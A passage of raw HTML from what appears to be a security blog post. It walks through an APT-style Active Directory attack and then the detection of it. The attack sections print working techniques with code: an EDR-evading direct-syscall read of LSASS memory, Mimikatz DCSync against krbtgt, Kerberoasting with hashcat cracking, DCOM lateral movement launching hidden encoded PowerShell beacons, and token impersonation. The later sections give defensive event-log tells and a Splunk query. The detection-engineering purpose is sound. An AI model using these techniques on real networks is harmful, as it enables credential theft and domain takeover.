16%)\">,</span><span class=\"token plain\"> PROCESS_VM_READ </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> PROCESS_QUERY_INFORMATION</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&amp;</span><span class=\"token plain\">oa</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&amp;</span><span class=\"token plain\">cid</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\">   </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// direct syscall  no EDR hook</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// Read LSASS memory regions containing credentials</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">NtReadVirtualMemory</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">hProc</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> baseAddr</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> buffer</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> size</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&amp;</span><span class=\"token plain\">bytesRead</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><br></span></code></pre></div></div>\n<p><strong>Method 3: DCSync (requires Replicating Directory Changes All)</strong></p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Mimikatz  executed on any machine where the operator has sufficient privileges</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Does NOT need to run on a DC</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">lsadump::dcsync /domain:corp.local /all /csv</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># OR for a specific account:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">lsadump::dcsync /domain:corp.local /user:krbtgt</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Output:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Object RDN           : krbtgt</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">** SAM ACCOUNT **</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">SAM Username         : krbtgt</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Account Type         : 30000000 ( USER_OBJECT )</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Credentials:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Hash NTLM: 8846f7eaee8fb117ad06bdd830b7586c</span><br></span></code></pre></div></div>\n<p>With the <code>krbtgt</code> hash, the attacker can forge Kerberos tickets for any account in the domain  a <strong>Golden Ticket</strong>. The domain is fully compromised. Resetting <code>krbtgt</code> once is insufficient (it must be reset twice, 10 hours apart, to invalidate all forged tickets).</p>\n<p><strong>Method 4: Kerberoasting (offline, no LSASS access needed)</strong></p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Request service tickets for all Kerberoastable SPNs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Runs as any domain user  no elevated privileges required</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Add-Type -AssemblyName System.IdentityModel</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$spns = @(\"MSSQLSvc/sqlserver.corp.local:1433\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          \"HTTP/webapp.corp.local\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          \"backup/backupsrv.corp.local\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">foreach ($spn in $spns) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              -ArgumentList $spn</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $ticketBytes = $ticket.GetRequest()</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    # Extract RC4/AES encrypted portion and submit to hashcat</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span></code></pre></div></div>\n<p>Cracking with hashcat:</p>\n<div class=\"language-bash codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-bash codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">hashcat </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-m</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">13100</span><span class=\"token plain\"> kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        --rules-file /usr/share/hashcat/rules/best64.rule</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Against weak passwords, expect cracks in seconds to minutes</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Strong service account passwords (25+ chars, random) are infeasible to crack</span><br></span></code></pre></div></div>\n<p>The defense is trivially simple: service account passwords should be 30+ character random strings, managed via Group Managed Service Accounts (gMSA). Yet Kerberoastable accounts with crackable passwords are found in virtually every enterprise AD environment.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"stage-6-lateral-movement--dcom-in-detail\">Stage 6: Lateral Movement  DCOM in Detail<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#stage-6-lateral-movement--dcom-in-detail\" class=\"hash-link\" aria-label=\"Direct link to Stage 6: Lateral Movement  DCOM in Detail\" title=\"Direct link to Stage 6: Lateral Movement  DCOM in Detail\" translate=\"no\">​</a></h3>\n<p>DCOM lateral movement is the technique that most SOCs have inadequate detection coverage for.</p>\n<p><strong>MMC20.Application object:</strong></p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># From attacker-controlled host, targeting VICTIM-HOST</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$com = [System.Activator]::CreateInstance(</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    [System.Type]::GetTypeFromProgID(\"MMC20.Application\", \"VICTIM-HOST\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Execute arbitrary command on remote host  spawns under mmc.exe on target</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$com.Document.ActiveView.ExecuteShellCommand(</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"cmd.exe\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $null,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"/c powershell -nop -w hidden -enc [BASE64_BEACON]\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"7\"   # window state: hidden</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">)</span><br></span></code></pre></div></div>\n<p><strong>ShellWindows / ShellBrowserWindow (execution appears under explorer.exe):</strong></p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$com = [System.Activator]::CreateInstance(</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    [System.Type]::GetTypeFromProgID(\"Shell.Application\", \"VICTIM-HOST\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$item = $com.Windows() | Where-Object {$_.FullName -like \"*explorer*\"} | Select -First 1</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$item.Document.Application.ShellExecute(</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"cmd.exe\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"/c powershell -nop -w hidden -enc [BASE64_BEACON]\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"C:\\Windows\\System32\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $null,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">)</span><br></span></code></pre></div></div>\n<p><strong>What this generates in Windows event logs on the target:</strong></p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Event ID: 4688 (Process Creation)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Creator Process: C:\\Windows\\explorer.exe</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  New Process:     C:\\Windows\\System32\\cmd.exe</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Command Line:    cmd.exe /c powershell -nop -w hidden -enc AAAA...</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Logon ID:        0x3E7</span><br></span></code></pre></div></div>\n<p>There is <strong>no</strong> Event ID 7045 (service installed), <strong>no</strong> 5140/5145 (share access), <strong>no</strong> 4648 (explicit credential logon if pass-the-hash is used). The two event IDs most lateral movement detections are built around are absent.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"section-3--what-telemetry-catches-and-what-it-silently-misses\">Section 3  What Telemetry Catches and What It Silently Misses<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#section-3--what-telemetry-catches-and-what-it-silently-misses\" class=\"hash-link\" aria-label=\"Direct link to Section 3  What Telemetry Catches and What It Silently Misses\" title=\"Direct link to Section 3  What Telemetry Catches and What It Silently Misses\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"what-edr-catches-well\">What EDR Catches Well<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#what-edr-catches-well\" class=\"hash-link\" aria-label=\"Direct link to What EDR Catches Well\" title=\"Direct link to What EDR Catches Well\" translate=\"no\">​</a></h3>\n<table><thead><tr><th>Technique</th><th>Detection Method</th><th>Reliability</th></tr></thead><tbody><tr><td>Default Cobalt Strike beacon</td><td>Memory scanning for beacon PE characteristics</td><td>High</td></tr><tr><td><code>CreateRemoteThread</code> injection</td><td>Sysmon Event ID 8, anomalous source/target</td><td>Medium-High</td></tr><tr><td>Direct <code>OpenProcess</code> to LSASS</td><td>Kernel callback instrumentation</td><td>High</td></tr><tr><td>Mimikatz binary on disk</td><td>AV signature</td><td>High</td></tr><tr><td>Common LOLBin abuse (<code>certutil</code>, <code>mshta</code>, <code>regsvr32</code>)</td><td>Process creation + command line</td><td>Medium</td></tr></tbody></table>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"where-detection-fails\">Where Detection Fails<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#where-detection-fails\" class=\"hash-link\" aria-label=\"Direct link to Where Detection Fails\" title=\"Direct link to Where Detection Fails\" translate=\"no\">​</a></h3>\n<p><strong>Token impersonation  near-zero detection coverage:</strong></p>\n<p>When an attacker calls <code>ImpersonateLoggedOnUser</code> or duplicates a token via <code>DuplicateTokenEx</code> + <code>CreateProcessWithTokenW</code>, the resulting process inherits the victim token. Event ID 4688 shows the impersonated user as the process creator  it looks like that user legitimately launched the process.</p>\n<div class=\"language-c codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-c codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// Attacker runs as SYSTEM, impersonates Domain Admin token from a running session</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">HANDLE hDupToken</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">DuplicateTokenEx</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">hToken</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> TOKEN_ALL_ACCESS</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                SecurityImpersonation</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> TokenPrimary</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&amp;</span><span class=\"token plain\">hDupToken</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">CreateProcessWithTokenW</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">hDupToken</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"cmd.exe\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// Event 4688: Creator = DA_username, Parent = legitimate process</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// No anomaly signal at process level</span><br></span></code></pre></div></div>\n<p>Detection requires correlating the logon session ID of the created process against the process tree lineage  available in Sysmon EventID 1 <code>LogonId</code> field but rarely queried.</p>\n<p><strong>Pass-the-hash  the tell is a single field almost nobody checks:</strong></p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Event ID: 4624 (Logon)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Logon Type: 3 (Network)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Authentication Package: NTLM</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Logon Process: NtLmSsp</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Workstation: ATTACKER-HOST</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Key Length: 0       &lt;-- THIS IS THE TELL</span><br></span></code></pre></div></div>\n<p>Key Length of 0 in a Type 3 NTLM logon indicates no session key was negotiated  a characteristic of pass-the-hash. This field is almost never included in standard SIEM correlation rules.</p>\n<p><strong>DCSync  only caught if audit policy is correct:</strong></p>\n<p>DCSync generates Event ID 4662 on the Domain Controller, but <strong>only</strong> if <code>Audit Directory Service Access</code> is enabled for success events  which most environments have disabled due to log volume.</p>\n<p>When enabled, the signal is unambiguous:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Event ID: 4662</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Object Type:  domainDNS</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Properties:   DS-Replication-Get-Changes</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                DS-Replication-Get-Changes-All</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Subject:      CORP\\jsmith    &lt;-- should be a computer account, not a user</span><br></span></code></pre></div></div>\n<p>A 4662 event where the subject is a <strong>user account</strong> (not a <code>$</code> computer account) requesting replication permissions is an unconditional true positive  it has no legitimate explanation in a normal environment.</p>\n<p><strong>Low-and-slow Kerberoasting  no volume anomaly to detect:</strong></p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Event ID: 4769 (Kerberos Service Ticket Operation)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Account Name:  jsmith@CORP.LOCAL</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Service Name:  svcbackup</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Ticket Encryption Type: 0x17   &lt;-- RC4-HMAC: this is the tell</span><br></span></code></pre></div></div>\n<p>Encryption type <code>0x17</code> (RC4-HMAC) for a TGS request, when AES is available and expected, is anomalous. If your service accounts are configured to support only AES, any RC4 TGS request is impossible under normal operation  making it a zero-false-positive detection.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"section-4--the-three-detection-checkpoints-you-must-win\">Section 4  The Three Detection Checkpoints You Must Win<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#section-4--the-three-detection-checkpoints-you-must-win\" class=\"hash-link\" aria-label=\"Direct link to Section 4  The Three Detection Checkpoints You Must Win\" title=\"Direct link to Section 4  The Three Detection Checkpoints You Must Win\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"checkpoint-1-c2-beaconing-detection\">Checkpoint 1: C2 Beaconing Detection<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#checkpoint-1-c2-beaconing-detection\" class=\"hash-link\" aria-label=\"Direct link to Checkpoint 1: C2 Beaconing Detection\" title=\"Direct link to Checkpoint 1: C2 Beaconing Detection\" translate=\"no\">​</a></h3>\n<p><strong>Connection interval jitter analysis (Splunk)</strong></p>\n<p>Normal browsing generates variable connection intervals. A beacon sleeping 45s ±25% generates intervals clustering in a 33–56 second band  low variance over many observations.</p>\n<div class=\"language-spl codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-spl codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">index=proxy dest_category=external action=allowed</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| eval interval=_time</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort src_ip dest_ip _time</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| streamstats window=2 current=t by src_ip dest_ip</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    last(_time) as prev_time</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| eval gap = _time - prev_time</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where gap &gt; 0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| stats</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    count          as req_count,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    avg(gap)       as avg_interval,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    stdev(gap)     as jitter,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    min(gap)       as min_gap,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    max(gap)       as max_gap</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    by src_ip, dest_ip</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where req_count &gt; 20</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    AND avg_interval &gt; 20</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    AND avg_interval &lt; 300</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    AND jitter &lt; 15</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    AND (max_gap - min_gap) &lt; 60</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| table src_ip, dest_ip, req_count, avg_interval, 